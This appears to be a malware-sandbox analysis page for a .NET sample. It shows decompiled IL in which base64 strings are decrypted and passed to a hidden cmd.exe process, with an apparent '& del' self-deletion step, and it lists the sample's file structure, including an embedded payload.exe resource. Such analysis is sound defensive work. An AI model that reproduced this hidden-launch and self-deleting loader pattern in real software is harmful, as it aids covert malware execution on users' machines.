System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_18 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_19 ldloc.s V_19 ldc.i4.5 <null> newarr System.String stloc.s V_26 ldloc.s V_26 ldc.i4.0 <null> ldloc.s V_18 stelem.ref <null> ldloc.s V_26 ldc.i4.1 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.2 <null> ldstr " & del " stelem.ref <null> ldloc.s V_26 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_26 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_19 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_19 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ret <null>
1facb72432963ada9ef94a4c07a80fa6 (1.25 MB)
File Structure
1facb72432963ada9ef94a4c07a80fa6
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
payload.exe
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙